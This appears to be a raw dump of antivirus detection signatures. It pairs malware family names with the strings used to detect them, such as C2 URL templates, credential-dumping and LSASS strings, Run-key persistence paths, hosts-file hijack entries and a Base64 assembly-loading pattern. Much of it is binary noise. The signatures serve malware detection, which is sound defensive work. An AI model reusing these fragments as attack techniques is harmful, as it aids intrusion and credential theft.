BrowserModifier:Win32/Veplugin.A BrowserModifier:Win32/Veplugin.A !Ponmocup 8]#] !Fareit.A !0*#R, 0,J<h !Hulstor.A !Sefnit.M !Ldpinch.CR VMM`t !Slenfbot.AKO Rogue:MacOS_X/FakeMacdef QWgZeof http://%@/mac/soft.php?affid=%@ http://%@/mac/soft.php?affid=%@ cd /Applications;unzip %@;rm -rf __MACOSX )cd /Applications;unzip %@;rm -rf __MACOSX http://%@/mac.php%@ ?v=%@&affid=%@&data=%@ http://%@/mac.php?affid=%@ http://%@/i.php?affid=%@ !Dorkbot.B A4wLO !Koobface.AU %s?action=twreg&mode=res& /.sys.php !Agent.PL +:YUm !Small.gen!BK c:\\window !Sefnit.N !Neeris.BG !Pushbot.VA !Small.gen!BL !Small.gen!BM !Sefnit.O %s\\sfc.exe %s\\sfc.exea !#HSTR:PWS:Win32/Jauxeer.B software\\%s WSASocketA CreateToolhelp32Snapshota !#HSTR:TrojanDownloader:Win32/Zlob.gen!BO.1 %s\\ssw%s%d.exe %s\\ee%s%d.exe %s\\eea%s%d.exe %s\\ggq%s%d.exe %s\\hjs%s%d.exe %s\\hjs%s%d.exea !#Lowfi:PUA:BundlerCluster:SearchSuite \"software\\datamngr \"o com a internet. ,--restore-last-sessiona !#HSTR:Win32/CoinMiner.D fee.xmrig.com -o, --url=URL )cryptonight (default) or cryptonight-lite -a, --algo=algo xmrig/%s libuv/%s%s donate.xmrig.com donate.xmrig.coma !#HSTR:Win32/Keylogging.B attachthreadinput getforegroundwindow getcurrentthreadid \twritefile createfile getwindowthreadprocessid getwindowthreadprocessida !#TEL:Trojan:Win32/Env_Aware user1 VMware Virtual HD Wireshark.exe samplea !#HSTR:Adware:Win32/Cashback.1.0 SelfupdateURL InstallURL2 DownloadURL AgreeURL BootURL2 \tBootDate= UserID= Product= Version= Count= Date= Date=a !#HSTR:TrojanDropper:Win32/Yangxiay.A >Del1.Bat :DeleteFile \" goto StillExists >Del1.Bat :DeleteFiledel \"\" /Aif exist \"\" goto StillExists GetDriveTypeA DllRegisterServera !#HSTR:Program:Win32/Pameseg!Hosts \tsms911.ru help-cmc.ru bitcash.ru super-filez.biz vskachke-premium.com vskachke.com za-load.ru za-premium.com za-premium.coma !#ALF:Adware:Win32/EoRezo.AM!MTB =SOFTWARE\\Classes\\CLSID\\{55FC8D93-9E8B-41D6-84A4-09830910158D} =SOFTWARE\\Classes\\CLSID\\{8244CE7C-A878-4BE9-8B6B-19206DA348C2} =SOFTWARE\\Classes\\CLSID\\{8244CE7C-A878-4BE9-8B6B-19206DA348C2}a !#HSTR:Win32/DelphiFile FPUMaskValue TInterfacedObject MAINICON Software\\Borland\\Locales Software\\Borland\\Delphi\\Localesa !#ALF:HackTool:Win32/PwDump!MTB quarks-pwdump.exe <options> \\SAM\\Domains\\Account \\Policy\\Secrets\\NL$KM\\CurrVal OpenProcessToken() | / / __ \\_| | \\/| | / / __ \\_| | \\/|a !#HSTR:ThreeBrazillianBanks caixa.gov.br hsbc.com.br itau.com.br prime.com.br safra.com.br santander.com.br serasaexperian.com.br serasaexperian.com.bra !#HSTR:MSIL/MulEnc.MJ BlowFish DecryptARC Alpha (E117A40BF9A3AE32474AD7B22EB4C60E95D3BE2A ':\\Users\\AymenTLILI\\Desktop\\StarterPack\\ ':\\Users\\AymenTLILI\\Desktop\\StarterPack\\a !#App:NotAMiner:AwesomeMiner 6AwesomeMiner.RemoteAgent.Properties.Branding.resources $AwesomeMiner.Service.Core.Components #AwesomeMiner.RemoteAgent.Components #AwesomeMiner.RemoteAgent.Componentsa !#HSTR:Worm:Win32/OutlookMail &Outlook.Application AddressLists AddressEntries Attachments !#BM_AT:FileZilla JFileDescriptionFileZilla FTP Client ,ProductNameFileZilla Tim Kossea !VSCAN// Failed to find first file VSCAN// Failed to access file (VSCAN// Failed to create mapping of file \"VSCAN// Failed to map view of file \"VSCAN// Failed to map view of filea !#TEL:Trojan:Win32/Karkoff.B!bit cred set true! DropperBackdoor rimrun.com *Port?5505?5487?Servera !#HSTR:PWS:Win32/Janet!dha 4XFxTVFdJU00lc1xEZXZpY2VVcGRhdGVzXDUwMFxhdGhlbmEuZGxs FOUND TRACK: %s FOUND TRACK 2: %s \t<unknown> !#BM_AT:RemoteDestopApp RdClient.Windows.dll RHBinder__ShimExeMain (RdClient.Windows.exe 0Microsoft Remote Desktopa !#HSTR:Pinball_Names \tAppKikxSA LhootSA MossySkySA SeeqDoSA LukyLuSA BlueTurtleGamesSA zManateeSA KangoBoxSA RavenBleuSA VooMuuSA BrightBreezeSA BrightBreezeSAa !#HSTR:Torrent:Win32/Deluge 2Deluge Bittorrent Client deluge.exe deluged.exe \"exec importer.get_code('__main__') \"exec importer.get_code('__main__')a !#HSTR:Trojan:MSIL/AgentTesla.VI97!MTB \t\t\t!#HSTR:Trojan:MSIL/AgentTesla.VI97!MTB F_7_7_7_7_7 F_2_2_2_2_2 X_0_0_0_0_0 Z6666666666666 Q_8_Q_8_Q_8 ZZZZZZZZZZZ33333333 Sleepa !#ALF:Trojan:Win32/Lesknarly.A!dha .\\Lesnar\\documents\\visual studio 2013\\Projects\\ cG93ZXJzaGVsb Bvd2Vyc2hlbG \tY21kLmV4Z NtZC5leG \tjbWQuZXhl \tjbWQuZXhla !#HSTR:Roker_do_deep_rescan \\updater\\ C:\\SELF.EXE ZSoftware\\Microsoft\\Windows\\CurrentVersion\\Runa !#TEL:Backdoor:Win32/TinyP.A!dha winhld64 \"\\\\%s\\ADMIN$\\%s.%s -nosvc Failed to instlal service %d Failed to logon user %S\\%S:%S Failed to logon user %S\\%S:%Sa !#HSTR:PUA:KuaiZip.P1 (\\Install\\trunk\\out\\release\\setup.exe.pdb get_k_skin_fail load_k_fail \"SOFTWARE\\Hintsoft SOFTWARE\\Sicenta !#TEL:HSTR:Win32/Coinminer.AY stratum.dgb.theblocksfactory.com win32cldefender.exe \tDadas.gpu %lf.NEW DIFF LOLOLO mining.set_difficulty PAUSE: %d SLEPT: %d PAUSE: %d SLEPT: %da !#HSTR:PWS:Win32/Wowsteal.AC Hookon wowrecord.ini wowchina.com logon.worldofwarcraft.com SetWindowsHookExAa !#HSTR:VirTool:MSIL/Compressor.netshrink.A zThis application is compressed with .netshrink (demo version)a !#HSTR:KINGSOFTANTISPY SOFTWARE\\Kingsoft\\Antispy \"Kingsoft Internet \"Kingsoft Co.,Ltd.a !#TEL:HackTool:Win32/Htran [+] OK! I Closed The Two Socket. Windows date and time service -slave >Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]: >Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:a !#TEL:VirTool:MSIL/CryptInject.KA!MTB xz.dashi88.com/fash.ini 1Software\\Microsoft\\Windows\\CurrentVersion\\fashtag E:\\10193\\Release\\SnowFlake.pdb terminate@@YAXXZ terminate@@YAXXZa !#HSTR:HackTool:Win32/Gabrielle!dha 0S4M\\Domains\\4ccount r3gistry hive reading error! LSASS.EXE %s:%d:%s:%s:%s:: $Local LMPASSWORD LMPASSWORDa !#ALF:Trojan:Win64/Dryvan.R!dha CopyCorTo CorBindToRuntimeEx GetQOS GetRequestedRuntimeInfo IEEumn LoadKourDB LoadLibraryShim LoadOptrate LoadStringRC mscoree.dllCopyCorToCorBindToRuntimeExGetQOSGetRequestedRuntimeInfoIEEIEEumnLoadKourDBLoadLibraryShimLoadOptrateLoadStringRCa !#ALF:Trojan:Win32/Roseam.A!dha @openuploadlistdrivel=%s&c ^end^^%d|%s|%0 0G4GuG GtGuG A6_6X6_6X6S6B6 GtGuGA6_6X6_6X6S6B6a !#AllowList:Macrobondmaillauncher S\\ccnet\\Publish_Client\\work\\src\\mainapp\\Abacus.LaunchMail\\bin\\Release\\LaunchMail.pdb .Macrobond mail launchera !#AllowList:QuickLab \\Quicklab.exe Maksense .iSens - Electronica Lda 0netindexor2_client_starta !#ALF:Trojan:Win32/Dridex.MK!MTB RicochetingSpooky SunshadeRepenting StridencySpleens RicochetReshufflin StuntmanRetitling TrickleSomalia PuppetsProofread PuppetsProofreada !#HSTR:Trojan:Win32/Qhost.AP 127.0.0.1 32881.com 127.0.0.1 www.32881.com 127.0.0.1 hack.32881.com 127.0.0.1 backdoor.32881.com 127.0.0.1 backdoor.32881.coma !#BM_AT:Tokenvator &\\\\.\\pipe\\Tokenvator Tokenvator.pdb ,[+] Process Terminated *{0,-25}{1,-20}{2,-20}a !#HSTR:MSIL/LoadedBin.A P(Assembly.Load(Convert.FromBase64String( <.EntryPoint.Invoke(null, null)a !#PUA:Block:PassShow Habe2869f-9b47-4cd9-a358-c22904dba7f7 KeePass csv file $WebBrowserPassViewa !#Lowfi:PUA:BundlerCluster:4Shared range: bytes=%i- .?avdiskfile@@ .?avxmlloaderbase@xml@@ 6universaluseragent(winhttp)a !#PUA:Block:LoadMoney //binupdate.mail.ru ,Software\\Mail.Ru\\Agent \tnotoolbar partner_online_url +exe.agent.mail.ru/sputnik/mailrusputnik.exe +exe.agent.mail.ru/sputnik/mailrusputnik.exea !#HSTR:Backdoor:Win32/Ghost.E virus admin$ del %%0 shell\\open\\Command ,\\Device\\PhysicalMemorya !#HSTR:TrojanDropper:Win32/Kryptik.C $src=\"http://%s/js.php?affid=%s&kw=%s LdrLoadDll appinit_dlls loadappinit_dllsa Cannot call connect on UNBOUND socket in rendezvous connection setup FCannot call connect on UNBOUND socket in rendezvous connection setup Listen/accept is not supported in rendezous connection setup >Listen/accept is not supported in rendezous connection setupa !#HSTR:VirTool:Win32/VBInject.gen!AN.3 &WriteProcessMemory \"SetThreadContexta !#ALF:VirTool:MSIL/CryptInject.PA!MTB library.dll \\%Service.exe% Drop_Run Proper_RC4 Proper_RC4a !#AllowList:BhakteeSoftware Bhaktee Software Pvt. Ltd. (Opp. Municipal Comm. Bunglow, Rajkot - 7 VisualFoxProRuntime.9 ,inflate 1.2.3 Copyright 1995-2005 Mark Adler ,inflate 1.2.3 Copyright 1995-2005 Mark Adlera !#PUA:Block:Yantai SOFTWARE\\kaola tjkaola.sulang.com hao123JuziBrowser\\hao123Juzi.exe 9SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\kaola lijiuninstall.png lijiuninstall.pnga !#AllowList:WDExclusion SL.Framework.Config.WCF <Shell\\Open\\ddeexec\\Application 8SL.Framework.Config.Base.dlla !#HSTR:CMIDriver 0Audio Control Panel (CMI @code.google.com/p/cmediadrivers/ \"CurrentVersion\\Uninstall\\CMIDriver \"CurrentVersion\\Uninstall\\CMIDrivera !#PUA:ML:Blocked:Toptools *thescreensnapshot.com \\Common\\I18N\\conf.db 6Global\\Mutex_TOOLSI18NGUID_ ScreenSnapshot.pdb ScreenSnapshot.pdba !#Lowfi:PUA:BundlerCluster:OpenCandy .?avcfilerequest@@ .?avcdeclinebutton@@ -.?av?$catldllmodulet@vcvalidatemodule@@@atl@@ (%d%/%3s%/%d %d:%d:%da !#OFN:certutil.exe certutil.pdb URLCache $CertUtil URL Agent (CertUtil Application *disallowedcertstl.caba !#HSTR:Adware:Win32/InternetSpeedMonitor.B t jjW &upd_stopped upd_initialize upd_setup &upd_stoppedupd_initializeupd_setupa !#TEL:Ransom:Win32/Ransombuilder.A!rsm Ransomware Builder (Set Special Decryption Price For Country Download Ransomware Core /files/core.exe bitcoin bitcoina !#HSTR:TrojanDropper:Win32/Small.VO YRZYVa !#HSTR:TrojanDownloader:Win32/Fendires 6\\ferian\\WindowsDefender.exe Software\\ferian *www.bancofalabella.cla !#ALF:Trojan:Win32/Ratsnif.A!dha /cl_client_cmd.php /cl_client_file_download.php /cl_client_online.php /cl_client_file_upload.php pcap_open_live Poison Device IP Poison Device IPa !#PUA:Block:PBot (operacl.cf/click.php $Software\\Archive_v Hmcfckchjhehcdgoeihjjjbkcdpdfmloa.crxa !#AllowList:Omniform www.eomniform.com OFMailX.cab OFMailNP.jar JOmniForm Mailable Filler Bootstrapper OMNIBOOT.EXEa !#PUA:ML:Blocked:PCAcceleratePro \"Software\\VemoPCAP VemoPCAPSystem AVCPCAcceleratePro *SOFTWARE\\Alcohol Soft ClOnSpeeda !#ALF:Trojan:Win32/CryptInject.BK!MTB \tIsLogging PasswordHash fingers-.jpg MindLated.pnga !#HSTR:PossibleVeil.A <lambda> rstrip string_escape ctypes decode <module>a GP Bar \tC:\\GP.mht mutexGP access_to_cfg_gp L{4D5C8C25-D075-11d0-B416-00C04FB90376}a dtPlugin.DLL dtPlugin.DLLDllCanUnloadNow WhenU\\whuRoot &DTAdapter.DTAdaptera !#HSTR:HackTool:Win32/EmailDump.A!dha ,and yes is the default key,you can change it as you like but up to 16bytes. Lu's Zany Message Store Lu's Crazy Profile (democode) Lu's Crazy Profile (democode)a !#HSTR:PCMateKeylogger.A1 TfrmKeyLogger ButtonHiddenandSpyClick ButtonDeleteReportsClick ButtonViewReportsClick HotKeyManager HotKeyPressed HelpMoreFreeToolsLink HelpMoreFreeToolsLinka !#HSTR:PWS:Win32/QQpass.gen!C.1 QQNumber.ini doudou dll_qq 9START QQUIN: \t PWDHASH: \\ewh.db 0VerCLSID.exe firstrun firstruna Data\\GlobalMgr.db 4http://cdn.zry97.com/youxi (DownLoadFrame_splash \"zhudongfangyu.exea !#ALF:Trojan:Win32/NKHOPLIGHT!MTB fjiejffndxklfsdkfjsaadiepwn reykfgkodfgkfdskgdfogpdokgsdfpg etudjfirejer www.naver.com emailAddress= ct_init: length != 256 ct_init: length != 256a !#HSTR:RITSERVICE!CLEAN )Error! Load library: .\\CodeLib.dll CEntry )Error!Load library: .\\CodeLib.dllCEntry 8mailto:Support@ritservice.ru 0http://www.ritservice.rua !#PUA:BundlerCluster:SpeedUpMyPC addscheduledtaskonlogon Hrestore point created; number=%i64d. installerextensions.dll _writeusersid@8 _writeusersid@8a !#BM_AT:MSFRottenPotato MSFRottenPotato.exe MSFRottenPotato.pdb CMSFRottenPotato@@AEAAHPEADH L{00000306-0000-0000-c000-000000000046}a !#Adware:Win32/Windupdatesd .windupdates.com Win%d%ow%s S%y%nc%r%oA%d W%i%ndo%ws% S%erv%eA%d A%dm%il%l%i S%er%vi%c%e A%dm%an%ag%er C%ont%rol%le%r De%s%kA%d S%erv%ic%e De%s%kA%d S%erv%ic%ea !#SLF:Win32/CobaltStrike.A!dha cATGBBO mA@@KMZGA@ YG@JG\\ oMMK^Z.bO@I[OIK bAOJbGL\\O\\W mF\\ACK \t]W]@OZGXK |ZB{]K\\zF\\KOJ}ZO\\Z Zahir Accountinga !#ALF:HackTool:Win32/KMSActivator.K!MTB KMS Server Service Emulator KMS protocol RandomKMSPID KMS host extended PID KMS host current active clients KMSSS.exea !#TEL:Trojan:Win32/Dridex.E!MSR !#Adware:MSIL/SanctionedMedia :CurrentVersion\\Uninstall\\Smad \\SanctionedMedia\\Smad Release\\SmadUpdater.pdb $9f9a812c-2174-4d2b-a0aa-7671b634fba5 $9f9a812c-2174-4d2b-a0aa-7671b634fba5a !#AllowList:AtTool >UltraCam\\Src\\UltraMap\\AtTool\\AtTool\\obj\\x64\\Release\\AtTool.pdb AtTool.exe 3//Geospatial//Main//UltraCam//src//UltraMap//AtTool AtTool.Properties.Resources AtTool.Properties.Resourcesa !#HSTR:Torrent:Win32/BitComet GUI_BitComet_wx.pdb BitComet Commandline <BitComet - a BitTorrent Client (IDR_DLL_BITCOMET_RESa !#AllowList:ITSSecureWebBrowser \\ITSSB_Process.log Finished SecureSystem IsSecurityRunning Software\\ITS\\Secure Browser ResetBlacklistProcesses IsBlacklistProcessRunning IsBlacklistProcessRunninga !#ALF:Trojan:MSIL/AgentTesla.MFP!MTB \t\t\t!#ALF:Trojan:MSIL/AgentTesla.MFP!MTB %$c927a9ee-cedd-4165-9566-de3789afcb63 LamdaX.Hyatt PDAUserName PDAPassword OnLoada !#HSTR:Trojan:MSIL/AgentTesla.VI2227!MTB \tget_XVIII \tToBoolean SuspendLayouta !#HSTR:TrojanDropper:Win32/Kolosha.A keystart!!! CheckSumMappedFile InternetGetConnectedStatea !#HSTR:DigiNewsPressClient \\DigiNewsPress_Client.exe:*:Enabled:DigiNewsPress Newspaper K> >\" H.`1> >!ZlwJ cz?? cz?? i |,v>& j|,v>& [5?\"x FHD9> 9C<,?? :A|(r> >&=?:{ r>#MT > WkOQ\t? <\tKb? coaXN? EO3x> jW> *,Z&= -3^\t? ?%F|C= ?$HUV ? `c} yEi_? B?##% _?25q* ;*M?\t HD9> 7cz?? >\"Z[< ?%\\]h ? ab0 <!qsm 1O3x> +l?S? &Dt= '&Dt= ( <&2ZQb ? ?\t5Kk#e? ?$?A# g?#MO NHD9> l?S?% ?$4aw <!:;D HD9>% %DHD9>%&5 ')&U? s ? s ? 8; NoOpen Drive Msxml SYSTEM\\WPA vxdfile VBEFile WSFFile CATFile CDAFile CERFile chkfile cmdfile comfile CSSfile txtfile drvfile MSDASQL emffile epsfile hlpfile htcfile icmfile inffile inifile invfile JSEFile lnkfile midfile ocxfile P10file PFXFile SPCFile pbkfile pfmfile piffile PKOFile sysfile VBSFile IAS.Match.1 AIFFFile chm.file PerfFile & .lnk\\ShellEx & ADSystemInfo & DAO.Field.36 & IAS.InfoBase & IAS.NTGroups .aiff jpegfile curfile ( playflashdxa .bmp\\ShellNew .rtf\\ShellNew .txt\\shellnew ADsNamespaces HNetCfg.FwMgr IAS.CClient.1 IAS.IasHelper LDAPNamespace NameTranslate WSHController avifile\\clsid ias.urhandler rtffile\\shell SOFTWARE\\ODBC AlwaysShowExt rord.RTF.8 AudioCD ASP.HostEncode IAS.Accounting IAS.InfoBase.1 IAS.NTGroups.1 IAS.NTSamNames OlePrn.AspHelp SOFTWARE\\Fonts EditFlags .mhtml IAS.IasHelper.1 ITIR.LocalGroup http\\extensions scrfile\\shellex msbackupfile SOAP Moniker fonfile Font file giffile GIF Image pngfile PNG Image IAS.ADsDataStore IAS.NTSamPerUser IAS.NetDataStore Microsoft.XMLDOM OlePrn.AspHelp.1 ias.accounting.1 ias.auditchannel ias.nteventlog.1 Console \tFontSize software\\classes system\\setup Paint.Picture .htm\\OpenWithList MSProgramGroup exefile 2 ADODB.Record\\CLSID AVIFile\\Extensions IAS.ADsDataStore.1 hlpfile\\shell\\open ias.policyenforcer software\\microsoft FullScreen ADsDSOObject\\Clsid Word.Template.8 AVIFile\\Compressors AdvancedDataFactory DBRSTPRX.AsServer.1 ITIR.LocalWordWheel ITIR.WordWheelBuild applications\\hh.exe atl.registrar\\clsid batfile\\DefaultIcon catfile\\defaulticon cplfile\\shell\\runas icmfile\\defaulticon propertyentry\\clsid Software\\Java SYSTEM\\Setup Cmdline Text Document ADODB.Command\\CurVer ASP.HostEncode\\clsid AllFilesystemObjects Applications\\cag.exe Applications\\osa.exe Microsoft.XMLDSO.1.0 applications\\osa.exe ecmascript\\olescript software\\alifwfg Volatile Environment software\\kong SOFTWARE\\Classes\\.au SOFTWARE\\Classes\\ADs $Agent.Character.2 $URL:LDAP Protocol \tnullfile curfile\\defaulticon icofile\\defaulticon .mv\\PersistentHandler BMPFilter.CoBMPFilter RACplDlg.RARegSetting Scriptlet.Constructor ias.timeofday.1\\clsid ias.urhandler.1\\clsid system\\select SOFTWARE\\Classes\\.aps SOFTWARE\\Classes\\.dib SOFTWARE\\Classes\\.msc SOFTWARE\\Classes\\.otf SOFTWARE\\Classes\\.pma SOFTWARE\\Classes\\.tlb SOFTWARE\\Classes\\.ttc SOFTWARE\\Classes\\.wvx SOFTWARE\\Classes\\.xix SOFTWARE\\Classes\\.z96 PerceivedType perceivedtype audio Animated Cursor mhtmlfile\\defaulticon .avi\\PersistentHandler .dbg\\PersistentHandler .fnt\\PersistentHandler .gif\\PersistentHandler .m14\\PersistentHandler .msg\\PersistentHandler .p7m\\PersistentHandler .pot\\PersistentHandler .ttf\\PersistentHandler .txt\\PersistentHandler .vbx\\PersistentHandler .wav\\PersistentHandler OLETransactionManagers ias.auditchannel\\clsid software\\domain software\\kongqi software\\thanku Applications\\accwiz.exe software\\johndoe914 Keyboard Layout\\Preload software\\fuckyou software\\risingu *VisualStudio.exp.9.0 batfile $MS-DOS Batch File htafile $ HTML Application > ADODB.Stream Applications\\oledb32.dll Applications\\perfmon.exe UPnP.DescriptionDocument applications\\isignup.exe homepage.homepage\\curver ias.netdatastore.1\\clsid software\\antiware imgsvc Content Type image/gif ,PowerPoint.Template.8 rlogin (URL:RLogin Protocol rtffile &Rich Tect Document @\tAIFFFile $AIFF Format Sound AdvancedDataFactory\\Clsid Applications\\awdvstub.exe Applications\\cryptext.dll Applications\\drwatson.exe Applications\\explorer.exe Applications\\fpidcwiz.exe Applications\\graflink.exe Applications\\iexplore.exe Applications\\msrating.dll Applications\\netshell.dll Microsoft.DirectSoundWave applications\\fontview.exe applications\\hypertrm.exe applications\\orgchart.exe applications\\ttxmpc97.exe ias.mschaperrorreporter.1 identities identity login persist zasucks P10File (Certificate Request JavaScript \"JScript Language JSFile\\ScriptEngine JScript Microsoft.DirectMusicStyle WindowsInstaller.Installer Control Panel\\Sound HARDWARE\\ACPI\\FACS\\ software\\classes\\.ht htfile 0Microsoft.Jet.OLEDB.4.0 regedit *Registration Entries regfile CDO.Message OlePrn.OleSNMP OleSNMP Class Microsoft.Update.Downloader chm.file\\shell\\open\\command mime\\database\\charset\\ascii otffile\\shell\\print\\command Keyboard Layout\\Substitutes lastknowngood SOFTWARE\\Microsoft\\Direct3D 4Folder Redirection Editor content type image/x-icon dllfile ,Application Extension JRO.JetEngine JetEngine Class MMCCtrl.MMCCtrl MMCTask.MMCTask MMCTask class VBSFile\\ScriptEngine rtffile\\shell\\print\\command protocols\\name-space handler software\\uninstall 0o01gibex9 0rw89ibex9 13pfgibex9 3svmcibex9 6zuu1ibex9 9up1vibex9 atwa2ibex9 benmbibex9 cjteaibex9 fd1pqibex9 fegkhibex9 goz1aibex9 hiiwribex9 ikvyzibex9 jko0xibex9 kewpxibex9 mkdr9ibex9 0000-0000-C000-000000000046}\\DataFormats\\GetSet @Interface\\{00000610-0000-0010-8000-00aa006d2ea4}\\proxystubclsid @Interface\\{00020404-0000-0000-c000-000000000046}\\proxystubclsid SOFTWARE\\Microsoft\\COM3\\Setup Progman Folder*Administrative Tools notification packages scecli (software\\clients\\mail\\microsoft outlook 2Microsoft Office Outlook )SYSTEM\\ControlSet001\\services\\Tcpip\\Enum 0.ROOT\\LEGACY_TCPIP\\0000 DigitalProductId ProductType 3SYSTEM\\CurrentControlSet\\Enum\\Root\\LEGACY_MOUNTMGR nextinstance 4system\\currentcontrolset\\services\\mouhid\\parameters useonlymice :SOFTWARE\\Microsoft\\DirectDraw\\Compatibility\\SilentThunder =SOFTWARE\\Microsoft\\DirectDraw\\Compatibility\\DemolitionDerby2 @SYSTEM\\CurrentControlSet\\Control\\BackupRestore\\FilesNotToBackup @software\\Microsoft\\internet explorer\\advancedoptions\\http\\proxy @software\\classes\\typelib\\{3050f4e0-98b5-11cf-bb82-00aa00bdce0b} @software\\classes\\typelib\\{372fce32-4324-11d0-8810-00a0c903b83c} @software\\classes\\typelib\\{3d5905e0-523c-11d1-9fea-00600832db4a} @software\\classes\\typelib\\{5e77eb03-937c-11d1-b047-00aa003b6061} @software\\classes\\typelib\\{7988b57c-ec89-11cf-9c00-00aa00a14f56} @software\\classes\\typelib\\{92ad68aa-17e0-11d1-b230-00c04fb9473f} @software\\classes\\typelib\\{ac3b8b4c-b6ca-11d1-9f31-00c04fc29d52} @software\\classes\\typelib\\{bacedf3e-74ab-11d0-b162-00aa00ba3258} @software\\classes\\typelib\\{cd000000-8b95-11d1-82db-00c04fb1625d} @software\\classes\\typelib\\{d597deed-5b9f-11d1-8dd2-00aa004abd5e} @software\\classes\\typelib\\{eab22ac0-30c1-11cf-a7eb-0000c05bae0b} FriendlyTypeNameT@%SystemRoot%\\System32\\cryptext.dll,-6145 protocols\\handler\\res clsidN{3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} protocols\\handler\\ms-its Rms-its: Asychronous Pluggable Protocol H batfile\\shell\\edit\\command N\"%SystemRoot%\\System32\\NOTEPAD.EXE\" %1 htafile\\shell\\open\\command N C:\\Windows\\System32\\mshta.exe \"%1\" %* ias.radiusprotocol.1\\clsid N{6BC09894-0CE6-11D1-BAAE-00C04FC2E20D} imgutil.comapmimetoclsid.1 N{30C3B080-30FB-11d0-B724-00AA006C1A01} microsoft.xmldom.1.0\\clsid \"mime\\database\\charset\\csiso2022jp aliasforcharset\"_iso-2022-jp$ESC -clsid\\{09474572-b2fb-11d1-a1a1-0000f875b132} *MMCListPadInfo class -clsid\\{2206cdb0-19c1-11d1-89e0-00c04fd7a829} *MSDAINITIALIZE Class -clsid\\{2f94d7b0-bf63-11d1-a6a2-00c04fb9988e} *EndpointsTable Class -clsid\\{63da6ec0-2e98-11cf-8d82-444553540000} *Microsoft FTP Folder -clsid\\{7f1899da-62a6-11d0-a2c6-00c04fd909dd} *ScopeTree 1.0 Object -clsid\\{88c6c381-2e85-11d0-94de-444553540000} *ActiveX Cache Folder -clsid\\{ee09b103-97e0-11cf-978f-00a02463e06f} *Scripting.Dictionary 1Interface\\{755f9da6-7508-11d1-ad94-00c04fd8fdff} \"IWbemMultiTarget 1Interface\\{b196b287-bab4-101a-b69c-00aa00341d07} \"IEnumConnections 1interface\\{00000400-0000-0010-8000-00aa006d2ea4} \"ConnectionEvents 1interface\\{3050f55f-98b5-11cf-bb82-00aa00bdce0b} \"DispHTMLDocument 1interface\\{742b0e01-14e6-101b-914e-00aa00300cab} \"ISimpleFrameSite 1interface\\{e74a7215-014d-11d1-a63c-00a0c911b4e0} \"SecurityProperty 1interface\\{f3470f24-15fd-11d2-bb2e-00805ff7efca} \"IScriptErrorList 4clsid\\{228d9a82-c302-11cf-9aa4-00aa004a5691}\\progid 4clsid\\{274fae1f-3626-11d1-a3a4-00c04fb950dc}\\progid 4clsid\\{6bc096b1-0ce6-11d1-baae-00c04fc2e20d}\\progid IAS.Request.1 4clsid\\{6bc096da-0ce6-11d1-baae-00c04fc2e20d}\\progid 4clsid\\{72d3edc2-a4c4-11d0-8533-00c04fd8d503}\\progid PropertyEntry 4clsid\\{ccb4ec60-b9dc-11d1-ac80-00a0c9034873}\\progid MSDASC.PDPO.1 4clsid\\{d3e34b21-9d75-101a-8c3d-00aa001a1652}\\progid SOFTWARE\\Classes\\ADs\\CLSID N{4753da60-5b71-11cf-b035-00aa006e0975} $software\\classes\\telnet\\defaulticon <c:\\windows\\system32\\url.dll,0 $software\\classes\\tn3270\\defaulticon <C:\\Windows\\System32\\url.dll,0 SystemRoot C:\\Windows .system\\currentcontrolset\\control\\nls\\language installlanguage 0409 StiSvc 5SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows 5software\\microsoft\\directdraw\\compatibility\\MsGolf98 game.EXE 6SOFTWARE\\Microsoft\\Internet Explorer\\MAIN\\UrlTemplate www.%s.com www.%s.net www.%s.edu 6software\\microsoft\\internet explorer\\main\\urltemplate www.%s.org 7software\\microsoft\\internet connection wizard\\icwrmind entry_name :SYSTEM\\CurrentControlSet\\control\\safeboot\\minimal\\appmgmt :system\\currentcontrolset\\control\\safeboot\\minimal\\winmgmt :system\\currentcontrolset\\control\\safeboot\\network\\browser :system\\currentcontrolset\\control\\safeboot\\network\\netbios ;software\\microsoft\\directdraw\\compatibility\\rogue squadron ;software\\microsoft\\directdraw\\compatibility\\scorchedplanet p7rfile\\shell\\add\\command Rrundll32.exe cryptext.dll,CryptExtAddP7R PMicrosoft WinHTTP Services, version 5.1 batfile\\shellex\\drophandler N{86C86720-42A0-1069-A2E8-08002B30309D} hhctrl.systemsort.666\\clsid N{4662DAB0-D393-11D0-9A56-00C04FB68B66} )mime\\database\\charset\\csisolatincyrillic -CLSID\\{8856F961-340A-11D0-A96B-00C04FD705A2} ,Microsoft Web Browser -clsid\\{39981129-c287-11d0-8d8c-00c04fd6202b} ,CLSID_CMAPIAcctImport -clsid\\{50b6327f-afd1-11d2-9cb9-0000f87a369e} ,AD System Info Object -clsid\\{79eac9d1-baf9-11ce-8c82-00aa004ba90b} ,StdHlinkBrowseContext -clsid\\{99847C33-B1B4-11D1-8F10-00C04FC2C17B} ,CCOMNSScopeImpl Class 1Interface\\{AA000922-FFBE-11CF-8800-00A0C903B83C} $ICertServerPolicy 1interface\\{00000151-0000-0000-c000-000000000046} $AsyncIAdviseSink2 1interface\\{3050f1dd-98b5-11cf-bb82-00aa00bdce0b} $IHTMLUListElement 1interface\\{3050f55c-98b5-11cf-bb82-00aa00bdce0b} $DispHTMLRuleStyle 1interface\\{70c8e442-c7ed-11d1-82fb-00a0c91eede9} $ICrmMonitorClerks 1interface\\{b1efc385-9355-11d0-835c-00aa003ccabd} $ITTerminalSupport 1interface\\{d432e5f4-53d8-11d2-9a3a-00c04fb998ac} $ISdoDictionaryOld 1interface\\{db01a1e3-a42b-11cf-8f20-00805f2cd064} $IActiveScriptSite 1interface\\{df0b3d60-548f-101b-8e65-08002b2bd119} $ISupportErrorInfo 1interface\\{eab22ac2-30c1-11cf-a7eb-0000c05bae0b} $DWebBrowserEvents 1interface\\{f4854d48-937a-11d1-bb58-00c04fb6809f} $ITTAPIObjectEvent 4CLSID\\{0000061E-0000-0010-8000-00AA006D2EA4}\\ProgID adox.index.2.8 4CLSID\\{0CF774D1-F077-11D1-B1BC-00C04F86C324}\\ProgID 4clsid\\{ecabafca-7f19-11d2-978e-0000f8757e2a}\\progid QC.DLQListener 4clsid\\{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}\\progid JScript Author ;CLSID\\{00000315-0000-0000-C000-000000000046}\\AuxUserType\\2 Picture ;CLSID\\{00000316-0000-0000-C000-000000000046}\\AuxUserType\\2 